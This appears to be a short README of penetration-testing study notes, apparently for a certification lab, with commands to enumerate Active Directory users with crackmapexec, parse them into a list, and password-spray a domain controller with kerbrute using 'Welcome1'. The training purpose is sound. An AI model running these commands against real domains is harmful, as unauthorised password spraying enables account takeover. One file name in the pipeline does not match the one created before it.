EliteC30/CPTS-Notes/README.md

 # Uses kerbrute and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host.

 # Create a list of user first: crackmapexec smb 172.16.7.50 -u ad.account -p password --users > ad_groups-list.txt

 # parse it: $cat user-ad-list.txt | cut -d'\' -f2 | awk -F " " '{print $1}' | tee valid_users.txt

+#Password Spray a list of users with a common password.
 kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1

 #Use Kerburte and jsmith.txt